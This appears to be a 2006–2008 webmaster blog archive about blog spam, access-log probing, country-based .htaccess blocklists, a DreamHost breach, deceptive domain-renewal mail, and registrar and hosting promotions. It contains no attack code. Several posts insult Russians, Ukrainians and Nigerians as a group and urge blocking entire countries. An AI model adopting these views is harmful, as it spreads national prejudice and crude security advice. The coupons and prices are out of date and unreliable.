The Steel Guitar Forum is a (paid) members only community consisting of over 4000 professional and amateur pedal and non-pedal steel guitarists, located around the World. Most of the World's top steel players are members of this community, where information, techniques and music business discussions take place on a daily basis, as well as the exchange of equipment. For many of these members this website is their primary destination on the Internet and I know that they are missing it's presence during this outage. We are doing everything we can to get the SGF back online. In the meantime I recommend that all affected steel guitarists spend some extra time practicing their instruments!

The SGF is back online, as of the afternoon of May 23.
As it turned out both Western Digital hard disks in the WD MyBook Pro Edition II, external RAID enclosure failed at the same time!

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

March 24, 2008

Russian connection to user agent "WordPress/2.1.1" in website access logs

I read the access logs for my website every day and sometimes I see something that jumps out and grabs my attention, as not right. This month, that something is a bunch of attempts to grab various pages on my blog, in an unusual manner, with a very unusual user agent: WordPress/2.1.1

At first I thought that somebody is just trying to pick up my MovableType RSS feed, but that is not what they are after. So, I did a little research on "WordPress/2.1.1" and learned that it represents a hacker compromised version of the popular WordPress PHP blogging software, which was updated months ago, to version 2.1.2, by Wordpress.org. I suppose that there may be some Wordpress users who haven't heard that this version was hacked with a backdoor, and haven't bothered to check for updates, but the log entries I am seeing are not from a Wordpress blog. I decided to do a little investigating, which is something I am good at. So, I followed the IP addresses to see from whence they came.

What I have learned so far, regarding the visitors who have configured their browser with the user agent "WordPress/2.1.1" is that, (A) - they come at me with no "Referer" field entry, (B) - they always try to GET a blog article itself, followed immediately with a request for the HEAD, and (C) - they change IP addresses after getting my 403 (Forbidden) message and try again. This cloaking of IP addresses has no effect, since I am also blocking them by their User Agent string.

Let's take a look at the access log entries for this user agent (stretch out or maximize your browser):

67.228.198.50 - - [02/Mar/2008:00:58:01 -0700] "GET /blogs/2008/02/my_spam_analysis_for_february_18_24_2008.html HTTP/1.1" 403 350 "-" "WordPress/2.1.1"
67.228.198.50 - - [02/Mar/2008:01:04:52 -0700] "HEAD /blogs/2008/02/my_spam_analysis_for_february_11_17_2008.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

69.50.177.18 - - [13/Mar/2008:12:06:49 -0600] "GET /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 351 "-" "WordPress/2.1.1"
69.50.177.18 - - [13/Mar/2008:12:07:14 -0600] "HEAD /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

89.108.85.75 - - [23/Mar/2008:16:52:38 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
89.108.85.75 - - [23/Mar/2008:16:53:08 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

91.192.116.2 - - [23/Mar/2008:18:56:59 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
91.192.116.2 - - [23/Mar/2008:18:57:14 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

216.255.185.178 - - [24/Mar/2008:10:15:07 -0600] "GET /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1
216.255.185.178 - - [24/Mar/2008:10:15:22 -0600] "HEAD /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1

These are definitely not typical access log entries and nothing a normal search engine or human visitor would do. Wordpress is a software blog application that gets installed onto web servers. It is not a browser. User agents are words that identify a browser, or a search engine, or robot. Despite the diversity of IP addresses, these visits are not unrelated. Read my extended comments to see where these IP addresses are allocated and my conclusions about their source and probable intent.

Continue reading "Russian connection to user agent "WordPress/2.1.1" in website access logs" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

January 28, 2008

Russian & Exploited Servers Blocklist is now two blocklists

Prelude:
For the last couple of years I have been compiling and publishing lists of IP addresses belonging to ISP's and commercially hosted web servers in various parts of the World, from which unwanted spam, scams and server hacking attempts emanate. These lists are compiled in a format that is recognized by Apache Web Servers, using - <Files *> deny from - IP address directives (rules). They include both individual IP addresses and ranges of IP's, belonging to web hosts, server farms and ISP's, known as a CIDR. When a group of these blocked IP addresses and CIDR's are compiled into groups they become a "blocklist," sometimes mislabeled as "blacklist."

My blocklists can be used in at least two different Apache Server configuration files; "httpd.conf" (requires server root access like on dedicated servers) and ".htaccess" (used on shared hosting accounts). My blocklists are all used in private .htaccess files that go into the web root (e.g public_html), or individual folders, on an Apache hosted web site. If your web host allows .htaccess overrides on individual websites you can use any of my blocklists. Instructions are found on each page, in comments like this:

# Here is a sample comment as used in a .htaccess file.
# The # sign causes Apache to ignore the rest of this line

The Changes:
I can see from reading my Change Detection reports that a lot of webmasters are using my .htaccess blocklists. Those of you who are using my Russia and Exploited Servers Blocklist need to be aware that it has just been split into two new files. One deals just with ISP's and servers located in the former Soviet Union and Turkey, while the other deals with exploited servers owned by various web hosts and co-location server farms and data centers, in various countries (especially here in the good old USA!). The descriptions of these two blocklists are as follows...

The New Files:
The new Russian Blocklist is now located at www.wizcrafts.net/russian-blocklist.html and it contains IP addresses and CIDR's traced to Russia, The Ukraine, Bulgaria, Romania, Estonia, Latvia, Estonia and Turkey. I included Turkey in this blocklist because I get tons of spam coming through various ISP's in that country (e.g. Turk Telecom), plus numerous server redirection exploit attempts. Basically, the Russian Blocklist is comprised of ISP's, with some web hosting companies thrown if, which are located in Russia or these other Eastern Bloc countries. Most of the traffic I see from these folks are blog, access log and email spam, with the occasional server exploit attempt against my website. New IP addresses and CIDR's are added to this blocklist as I analyze spam sources, or trace log/blog spam attempts (all unsuccessful due to my security measures and filters) to countries covered by this file.

The new Exploited Servers Blocklist is located at www.wizcrafts.net/exploited-servers-blocklist.html
and contains long "deny from" lists of various types of web hosting and dedicated server companies, that are, have, or might try to run hostile codes against my web site, or spam my access logs, or bypass my security measures, or try to steal my traffic via proxy services. All of these things are hostile actions and are conducted by criminals and criminal organizations. This blocklist is growing rapidly as I see and trace exploits attempts against my server.

Conclusion:
If you have been using my previous file - russia+exploited-server-blocklist.html - please change your bookmarks to point to one, or both of the new files that have replaced it. Here is a list of my current .htaccess blocklists, as of this posting:

Exploited Servers Blocklist | Russian Blocklist | Nigerian Blocklist | Chinese-Korean Blocklist

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

August 29, 2007

Blog spammers still wasting their time tying to spam this unspammable blog

Sometimes people who you'd think know what they're doing are just so completely clueless that it makes me laugh! I am referring to Blog spammers; the guys in Russia, The Ukraine, Estonia and other parts of the former Soviet Union, who relentlessly pound away at their keyboards, sending comment and trackback spam messages to every MovableType blog they can locate. They must assume that most of these blogs accept these comments and blindly publish them, because they keep trying to post spam messages to MT blogs, linking back to their spamvertised websites hawking various drugs, or pornography.

Well, I for one don't allow any comments or trackbacks on my blog. It says so in plain, bold English and Russian words, at the top-right of every blog page, and in all of my blog search results pages. Look under the Google Search box, at the top right of this page, and you'll plainly see where it says:

SORRY: NO COMMENTS, NO TRACKBACKS
КОММЕНТАРИИ и TRACKBACKS ВЫКЛЮЧЕНЫ и НЕ ИЗДАНЫ!

Now, if I was wanting to spam this blog and I read that, I'd move along to an easier target and not waste my time on this one. Yet, when I read my server access logs I see that somebody keeps trying to post comments and trackbacks to specific articles in my archives (all of which get a server 403 response), then tries to search for them on the pages to which they were targeted. However, since I don't want any comments or trackbacks I have deleted the Perl files that handle them and disabled those functions in my global settings. Heck, I have even stripped out all the codes referring to trackbacks from my page templates. Even I can't post a trackback on this blog!

Since these spam comments never reach my blog, when the idiots who try to post them search for them on the target pages, nothing is found matching those spam terms. Boris the Spammer needs to get a life or find less secure targets to pester. Instead, he plugs away fruitlessly on this blog, filling my access logs with all kinds of new IP addresses for me to add to my ever-growing Russian Blocklist.

Countless webmasters are using my Russia+Exploited Servers Blocklist. Most of the IP addresses in the Russian blocklist are gathered from my own raw access logs, from stupid blog spammers who evidently can't read the English or Russian notice that I don't allow comments or trackbacks.

If you have a blog or forum that is getting scammed by Nigerians, or spammed by Russians, one or more of my .htaccess blocklists may help you get rid of these leeches. Note that they only work on Apache web servers, unless your Windows server has an isapi rewrite module installed by the company leasing the server space to you. You can use my Webmaster Contact page to hire me as a consultant to help keep scammers and spammers off your website.

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

August 4, 2007

Stupid Blog Trackback Spammers Don't Understand Server 403 Responses

The title of this article tells it all: "Stupid Blog Spammers Don't Understand Server 403 Responses!" Many months ago I discovered that although comments and trackbacks were not being posted to my blog, due to automatic moderation and classification of them as spam, nonetheless they kept on a-comin'. The comments spammers gave up a couple of months ago when they searched my blog only to learn that their bullshit comments had not been posted and never would be (I told them so on the search results page). However, the idiots who are trying to post trackback spam messages don't bother to search the blogs they are posting to, nor do they apparently read the responses sent by the script they are aimed at. If they did all they would see from my blog is a steady stream of server 403 responses; "Access Denied!" I don't even have the comments or trackbacks Perl modules installed anymore, so even I can't post comments or trackbacks to my own blog! I removed them when it became obvious that only spammers were commenting or tracking back.

If you run a MovableType blog and don't care to allow comments or trackbacks, yet you are seeing numerous attempts to spam your blog (in the list of junk comments and trackbacks), you can do what I did and disable them altogether, then delete or rename the files used to post these comments. To disable them in MovableType, log into your MT installation, then click on the left sidebar item "Settings" then click on the "New Entry Defaults" tab, then under "Default settings for new entries" uncheck both "Accept Comments" and "Accept Trackbacks," then scroll down to the bottom of the page and click on the "Save Changes" button. This will remove the Comments and Trackbacks links under all of your posts. You may still have to manually remove existing comments and trackbacks from old topics, or delete the old topics entirely if they have a lot of useless commenting in them.

Despite the fact that you have disabled accepting comments the spammers may still try to go straight to your Perl scripts that handle comments and trackbacks, bypassing the choices you made to exclude them. To prevent this you can either remove or rename these two files that are in the standard MT installation, under the CGI folder/MT (typically cgi-bin/MT/):
mt-comments.cgi
mt-tb.cgi

Without those files nobody is going to Post a spam comment to your blog and you can never accidentally re-enable comments or trackbacks unless you upgrade, or replace those files.

As I said in the beginning these spammers are not reading the results of their attempted trackback messages (success or failure), thus they are probably using automated scripts to send them out blindly from a spam list supplied to them by somebody even dumber than they are, without any concern about success or failure of their efforts. If you run your blog on an Apache hosted web server and want to deny access to these assholes read the technical details in my extended comments.

Continue reading "Stupid Blog Trackback Spammers Don't Understand Server 403 Responses" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

August 3, 2007

Block spammers, scammers and hackers with our .htaccess blocklists

There are millions of websites that host blogs and/or forums and many of them are targeted by scammers, spammers and hackers. Webmasters everywhere are searching for solutions to these problem-causing individuals and scripts. Some of you already know that I can help you block this unwanted traffic from your websites, but a great many more may just be discovering this fact. If your website, or blog, or forum is hosted on an Apache web server, and your hosting allows personal .htaccess overrides, read on.

For those who don't know what .htaccess is, it is an access control file used on Apache servers, on a per-website basis, to define who may or may not access all or parts of a website, and to rewrite requests for certain files, or folders, or URLs to other files, folders, or URLs. You will notice that the file name has no prefix ; just a period followed by htaccess. This makes it a normally hidden-system file on the Apache hosted web server. Hidden Apache files can be revealed by using a special FTP command: -al or a website control panel function on the file manager page, to display these hidden files for downloading or editing (show hidden files, etc). Your website may or may not already have a .htaccess file. If you upload with an FTP tool use the "remote file mask" -AL ( or -al) and refresh the remote view to see if .htaccess exists in your home, or public_html or / directory (more info in the extended comments). Otherwise, look at your website's file manager, or ftp tools in your Cpanel, or other website control panel. There should be some option to reveal hidden files beginning with a period.

If you do not use an FTP Client to upload files, but are using a web-based control panel, it is entirely up to your web host as to whether or not you can view, alter, or upload .htaccess files.

Important Notice! Be careful when creating, editing, or pasting codes into a .htaccess file, because if you type an invalid term, directive, or character, or add an unescaped space in a regular expression, you may cause a Server 500 error to occur, locking everybody out of the website, except via FTP access (with login credentials).

The blocklists that I am about to tell you about use the Apache Module mod_access which is almost always available in Linux based shared, vps, semi-dedicated, or dedicated hosting. Unfortunately, if your website is hosted on a Windows Server you are out of luck, unless your host has installed, or is willing to install the ISAPI_Rewrite module for you.

Assuming that your website is hosted on a Linux box running an Apache web server, and you are allowed to use a personal .htaccess file with mod_access - IP "deny from" directives, the following web pages may be of great help to you in blocking access from unwanted countries, ISPs or hostile servers that are trying to spam or exploit your server (or website).

First on the list is my first work in the field of blocking scammers from forums and auction sites; my Nigerian Blocklist. I have been and still am compiling this list of IP addresses assigned to Nigeria and most of it's neighboring countries in Africa, from which Nigerian scammers and other African fraudsters have operated against forums and auction sites around the (non-African) World. It is extremely effective at denying access to anybody trying to access your website from within Nigeria or other African countries, including via satellite Internet services. If you have a blog, auction site, or forum that is plagued by Nigerian scammers - try embedding my .htaccess directives into your .htaccess file, or create one by copying and pasting the contents of the one on my Nigerian Blocklist web page into a new plain text file (Notepad) and save it as .htaccess. If your computer's operating system won't allow you to save it without a file prefix, choose htaccess.txt then upload it to your server and rename it there to .htaccess . You will see an instant drop in the number of Nigerian scammers on your website.

The second blocklist deals with unwanted traffic coming from ISPs and servers within China, Korea and surrounding countries. This is my Chinese Blocklist. All of the same methods listed above apply to this mod_access deny from list. It can be copied and pasted into your .htaccess file just like the Nigerian list details show, or it can be added to that list by merging the two groups inside just one set of <Files *> directives. Note that if you do business with anybody in China, Korea or neighboring countries, they will not be able to access your website unless you "poke a hole" in the list to allow their IP address(s) in.

Lastly, I present for your viewing pleasure, the Russia and Exploited Servers Blocklist. This list is growing faster than the other two because I am getting hit constantly by so many Russian based blog and log spammers and server exploit attempts, from both shared and dedicated servers around the World. This blocklist contains a large number of IP addresses and CIDRs (basically means IP ranges) from Russia, The Ukraine and other former Soviet Bloc Countries, Turkey, Algeria, and from a huge number of exploited web servers, co-location server farms, and hosting companies around the World. Servers should not be trying to contact other servers, unless they have a relationship with each other. These servers want to hack or spam your server or websites and should be blocked.

All of these blocklists are still being added to or modified as new information is discovered about the sources of scams, spamming or hacking attempts from exploited servers. Each page has a button (under the bold last-modified date, before the directives) for you to use to sign up for alerts from the ChangeDetection bot, which will email a notice to you once a day, only on days that I have modified the blocklist you are monitoring. This is a free service that I use myself. Next to that button you will see a PayPal Donate button that I have placed there, where people who benefit from my voluntary work can show some financial appreciation. Any amount will be gladly accepted, with a $10 minimum please.

There are links to contact me for assistance or to provide input, on all of the blocklists, in the footer area.

Continue reading "Block spammers, scammers and hackers with our .htaccess blocklists" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

June 20, 2007

Steel Guitar Forum Server Offline Due To Cut T1 Cable

I am a member of and Moderator of the computers section of the Steel Guitar Forum, which has been offline since the morning of June 19 (2007). In an email exchange with the owner - b0b Lee - it was revealed that workers on the street outside of the server's location have accidentally cut his T1 line. AT&T will be repairing the line as soon as possible. SGF members may wish to use this time to practice their steel guitars, until the forum is back online.

The Steel Guitar Forum is a multi-section discussion forum for members only, most of whom are either amateur or professional pedal steel guitarists. I have been a member for a number of years since I am also a professional pedal steel player. My section is the computers forum, of which I am the moderator and a strong contributer.

Anybody who plays any type of steel guitar (pedal, non-pedal, or lap steel), or a resophonic guitar is welcome to apply for membership at the SGF.

UPDATE: The SGF is now back online.

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

June 8, 2007

3500 FTP account passwords stolen from DreamHost database

DreamHost Status Blog Archive Security Breach

It seems that somebody has managed to hack into the customer database for FTP login passwords, at the DreamHost website hosting company. According to an email sent out to the affected Dreamhost customers, 3500 accounts seem to have been breached by a hacker, or hackers, using as yet unknown attack vectors.

According to the update posted by DreamHost, on June 7, this may be a combination of security breaches, including keyloggers that may have been installed onto the affected users' computers. That means that the same thing could affect users of other web hosting companies. So far the hack appears to be the addition of various iframe codes or links to porn sites, to all files containing the word "index" of the compromised accounts. The file extension does not matter; if you have a file containing the word "index" it will be a target of this hacker. This includes index files in sub-directories, or add-on domains hosted under the same master account. Therefore, all website owners are urged to download their index files and inspect them for unauthorized modifications. If you find any remove them and notify your hosting provider, and scan your own computers for spyware, keyloggers, or backdoor trojans.

In one blog post about this I read that at least one DreamHost customer had all of his "index" files overwritten completely with a page containing an iframe exploit, leading to a website that installs a Trojan Horse program.

There is a statement about this incident, from the DreamHost blog, in my extended comments...

If you are a DreamHost customer, and you have scanned your computer for security breaches and found none, and you were notified that your account was among those compromised, and you are looking for another web host, I use and recommend BlueHost Web Hosting. They offer huge amounts of disk space and data transfer, plus unlimited add-on domains, for those who need to host multiple domains at a low monthly rate. I have all of the details on my BlueHost page. I have been with them for over 6 months and have had very little downtime - well less than I used to experience with my previous web host. My server has not been hacked, altho I see people trying to do so every day or two (by reading my raw access and error logs).

I am available to assist people whose websites and/or computers have been compromised by hackers, spyware, keyloggers, or other security threats. Please visit my home page for more information and links to my webmaster services and contact pages.

Continue reading "3500 FTP account passwords stolen from DreamHost database" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

May 25, 2007

Dotster New Domain Registrations at Half Price, May 26 - 28, 2007

Attention website owners!

If you have been thinking about registering a few new domain names, but were waiting until the price was "right," your moment has just arrived! Dotster Domain Registrars just announced a half price sale on new domain registrations, this coming Memorial Day Weekend, from May 26, through 28, 2007. Domains regularly priced at $14.95 will only cost you $7.48 per year, using my coupon code below.

Note that this only applies to brand new domain names, not renewals or transfers.

Particulars

Dates - May 26th, 27th, 28th

Discounted Extensions - .com, .net, .org, .biz, .us

Coupon Code: MDAY50

Bonus coupon code offer

Dotster also provides all manner of web hosting packages, from low cost shared hosting to VPS semi-dedicated, at very reasonable prices.

5 Free Domains with Any Dotster Web Hosting Package! Enter Coupon Code "5FORFREE"

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

March 20, 2007

March Madness Sale on Domains at Dotster

March Madness Domain Sale at Dotster

Yee Haw! Domain Registrar - Dotster, Inc. has just announced a March Madness sale on new and transfered Domain registrations, from now until April 1, 2007. Dotster is allowing unlimited numbers of registrations and transfers at the low low rate of only $7.00 each, when you use coupon code MADNESS during checkout. The regular price for new domain registrations at Dotster is $14.95, per year, so you will save a whopping 53% off new registrations. Domain transfers are regularly $8.95, so you will save 22%, plus gain one extra year on the expiration date, per domain transferred.

If you want to have a web presence you will need to have a domain registered with a recognized Registrar. Dotster is a leading ICANN-accredited registrar capable of registering your .com, .net, .org, .cc, .tv, .ws, .info, and .biz top level domain (TLD) names.

If you would like to learn more about Dotster's services, read my Dotster information page. I have been a happy Dotster customer for 7 years and won't even consider another registrar. Most of my Webmaster clients are also registered at Dotster. Dotster also offers fast and affordable custom web design.

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

March 7, 2007

Russian and Ukrainian Blog Spammers are STUPID!

< Begin Rant >
If you publish a blog (Weblog) using MovableType, I'm certain that you have learned that if you accept comments, or trackbacks, that you are going to attract blog spam (splog). I used to allow comments and trackbacks on my blog until I found that all of the comments and trackbacks were 100% spam, with links to sleazy websites. Being the curious, suspicious spam/scam hunter type person that I am, I began studying my raw access logs to see where this crap was coming from. I wasn't surprised when I discovered that most of the blog spam I was getting aimed at my blog was coming from a few IP addresses in the Ukraine and Russia. Normally I would consider Russians and Ukrainians to be educated, intelligent folks, but now I have to wonder if I was mistaken in that line of thought.

The reason I make such a harsh statement is because I have not allowed comments or trackbacks to be posted for a long time now (Turn Off Comments and Trackbacks), and when I did allow them I always moderated them and deleted spam comments; they were never posted. In an effort to curtail the continuing attempts to post spam to my blog I have even removed the files used to post comments and trackbacks to my MovableType blog. Still, every day, for hours at a time, idiots in Russia and the Ukraine keep trying to spam to my blog, despite the fact that I clearly state that no comments or trackbacks are accepted, and the files that are required for them are gone. Everytime these idiots Post a comment or trackback my server gives them a 403 Forbidden response, but they don't seem to care, or notice, or are too uneducated to understand that Access Denied means that their request failed to go through! So, growing tired of even giving them the courtesy of a 403 response I am now redirecting all of these bullshit attempts to Post comments or trackbacks right back to the sender's own browser or web appliance; to 127.0.0.1. That should result in a Page Cannot Be Displayed or Server Cannot Be Located message on the program the idiots are using to try to spam me.

The blog spammers are even resorting to using hijacked proxies, on computers in other countries, but they all get the same message, since I block all such exploits in my .htaccess file. I wasn't born yesterday. I know how to block IP addresses, proxies and unwanted behavior or exploits on my server. I also know how to track the source to their ISP and report them for spamming.

If you run MovableType blogs on an Apache Server, and are interested in seeing in my solution to the problem of blocking blog spammers, read my extended comments.

Continue reading "Russian and Ukrainian Blog Spammers are STUPID!" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

February 27, 2007

Dotster $7 Domain Registrations - One Day Only - Feb 28, 2007

If you are a website owner, and are thinking about adding another domain name, Dotster.com
is having a one day sale on all new domain registrations of the TLDs: .com, .net, .org, .biz and .us. For the 24 hour period beginning tomorrow, February 28, at 12:01 AM, through 11:59 PM, PST, all new Registrations are only $7.00 for one year! The regular price for these TLD registrations is $14.95/yr. That represents a savings of $7.95 bubba, and that ain't hay! Heck, at that price I'll grab a couple of new domain names and park them on my home page, or add them on to my BlueHost account, since they allow up to 5 additional domains to be hosted under one account, for free.

To grab your $7.00 domain go to Dotster.com
on Feb 28 and use the coupon code: 7domain, when you place the order.

I have more information about Dotster Domain Registratrar on my website. I also have a complete webpage about BlueHost, here.

Dotster is also offering coupon code discounts on a second year of web hosting (7hosting), and on their in-house website design services. Visit Dotster.com
before March 1, 2007, for the details.

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

January 20, 2007

Domain Registrar - Liberty Names - Sends Misleading "Domain Name Expiration Notice"

If you own any Internet Domains you already know that they require a valid Domain Registrar to hold your registration information, before they can go live on a web host or server. I have had website domains since around the year 2000, and they have all been registered through the same Registrar; Dotster.

Today I received a deceptive letter in the mail from Liberty Names of America, apparently a Domain Registrar. At the top right, in large bold type it said: Domain Name Expiration Notice. After that, in small print, it stated: "As a courtesy, we would like to remind you that it's time to renew your domain name, which is expiring on April 27, 2007." Below that it listed one of my various domain names and a reply by date of March 14, 2007. The rest of the details in the letter are in small type, except for the parts where it outlines the renewal rates for 1, 2 and 5 years, and the place where the gullible would fill in their credit card details to "renew" their domain with these pirates.

As I stated in the first paragraph, Dotster, Inc. is and always has been my domain Registrar. Liberty Names Of America is harvesting the Whois records for as many domains as they can lookup, then sending out phoney renewal notices to capture business away from the existing Registrars, by decieving gullible recipients of these letters. To be fair, the letter does state, in small print, that they are not your current Registrar, and that they want you to transfer to them. The back side of the letter contains almost 7" of type that is so tiny that it requires a magnifying glass to read it. In that tiny type are the legal details and disclaimers for their transfering of your service.

As a reference to you all, I currently pay $14.95 per year (1 yr renewals) to maintain my domains at Dotster. Liberty Names is offering me the fabulous opportunity to transfer my domain away from $14.95 a year with Dotster to them, for the low rate of only $25.00! Hmmm. Simple math tells me that they are charging almost twice what Dotster charges for common TLD domain name registration. PIRATES! Take me off your mailing list, Liberty Names of America. You are slimeballs, just like DROA, who sends out similar Expiration Notices to domain owners. Are you the same slimeball company under a different name? Go F yourself!

Now that my tirade is over, if you really do need a decent domain registrar, one that won't dick you around, I recommend Dotster. For $14.95 you can register your domains, not $25, or $35, or $40 per year that the ripoff registrars charge. They do have sliding reduced rates for 5 or 10 year renewals and charge only $8.95 to transfer your existing domain, plus they add one year to it's expiration date.

Nuff said.

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

August 31, 2006

My Website Hosting Page Has Been Totally Revamped

I finally put the finishing touches on my revamped website hosting page, found at www.wizcrafts.net/hosting.html, on August 30, 2006. This is the first major overhaul of that page in many months.

The old page made a very brief mention about what hosting is and only scraped at the surface of the concept of different types of hosting accounts. It then went on to list the detailed features of a few select web hosting companies, wih no mention of alternatives. to say the least it was lacking in breadth of coverage.

The new hosting page is totally the opposite in how it presents information. The first half of the page contains reasonably detailed explanations about what website hosting is, what web servers are, and details the differences between dedicated, semi-dedicated, VPS and shared web hosting.

The next section explains domain name registration and registrars.

Following that I have embedded a comparison of over 20 shared-hosting companies, outlining their allowed disk space, bandwidth (data transfer), email or FTP accounts, add-on domains policies and pricing (monthly and annual). I have also created separate pages detailing the features of the various hosting plans, showing as many features as the company publishes online. Those pages contain links to the companies and to alternate services like VPS servers. I have not finished the features pages for all of the listed web hosts, but am in the process of creating new ones every day or two. I am also trying to keep the disk space/bandwidth/pricing up to date, as several companies are frequently changing their plans to respond to their competitors.

I also plan to include a voting script on each features page, in the immediate future. I look forward to your input to help rate the various hosts according to your own experiences with them (not hearsay).

The final section of the new hosting page deals with website promotion tools and has several very useful links to help you get listed or improve you online business prospects.

Please avail yourselves of this information, found at www.wizcrafts.net/hosting.html

Continue reading "My Website Hosting Page Has Been Totally Revamped" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

May 19, 2006

Beware of DROA Domain Name Expiration Notice Postal Mailings

This is a heads-up warning to my fellow Domain owners to watch out if you get a letter in the mail from Domain Registry Of America, or some other Domain Registrar with whom you are not already affiliated as a customer.

Today I got a letter from Domain Registry Of America, addressed to my master account name used in the Whois Directory. The letter proclaims in large bold text:
Domain Name Expiration Notice
It then displays one of my Domain names that is due for renewal in 6 months and "As a courtesy to Domain name holders, we are sending you this notification ....."

Upon carefully reading the details they do make it clear that they are not your current Registrar, and want you to switch from you Registrar to DROA. They brag about only charging $30 for a one year renewal fee, and a bargin rate of only $50 for two years. There are checkboxes to place your order and a place to input your credit card numbers, which you would then mail in. There is a huge amount of information and disclaimers on the back of the letter that are in such a small font I had to get a magnifying glass to read it. I wouldn't transfer to these people if they were the last Registrar on earth.

If I was paying $35.00 a year for a Domain that would sound like a bargain, but I am a Dotster customer (see below), and only pay $14.95 per year for TLD Domains (or less if there is a special deal or Happy Hour Sale). If I was fooled into transferring to those people it would double the cost of renewing my Domains. Luckily I wasn't born yesterday.

Many Domains are owned by companies that have different people who know different details about the business, but not everything. These people are probably hoping that this letter will end up at Accounts Payable, where the secretary will call somebody to ask if they have a Domain that might need to be renewed, to which that person may say I think so. The Accounts Payable will pay the invoice by credit card and the company will have their Domain name transfered away from their current chosen Registrar by trickery, probably at increased expense.

I have seen other letters from other Registrars that never mentioned that they are not my current Registrar, asking for x amount of dollars to renew my expiring Domains. This is pure fraud, trying to get me to pay an invoice to a company with whom I have absolutely no relationship. If you do make the mistake of transferring your Domain to such a company you will probably never be able to get them to let you change back. Once a company like that gets your Domain name they make it almost impossible to transfer away from them. Legitimate Registrars have a simple method of locking and unlocking Domain transfers, with no fees (see below about Dotster).

As a Domain owner make it your business to know with whom your Domains are registered and what the renewal dates are for each Domain. Most Registrars with whom you are a customer will attempt to contact you by email first, to let you know 60 days in advance of a renewal date. Always check carefully when you receive a Domain renewal notcie to be sure it is from the Registrar who holds that Domain for you.

My Recommended Registrar:

If you are paying more than $14.95 a year for your Domains take my recommendation and check out Dotster.com. Dotster is an ICAAN Accredited Registrar and is above board all the way. They will not try to scam or trick you into unwittingly transferring a Domain to them. In fact, if you do transfer an existing Domain to Dotster they only charge $8.95 for the transfer and first year Registration, plus they extend your expiration date by an additional year. I have a lot more info about this on my Dotster web page. I have been a Dotster customer since the year 2000 and have never had a complaint about their services or methods of communications.

Continue reading "Beware of DROA Domain Name Expiration Notice Postal Mailings" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

April 24, 2006

Register New Domains At Dotster.com

The Happy Hour $2.00 Domain name sale has expired, at Dotster.com. I'll let you know when the next one is announced.

If you need to register a new or additional Domain name, I recommend Dotster, which is my Registrar. TLDs go for $14.95 /yr, and transfers are $8.95 with one additional year added to your expiration date, and they have a limited time sale on .info Domains, for only $2.99 for one year.

Use this link to go to the Dotster home page and search for your desired Domain name(s).

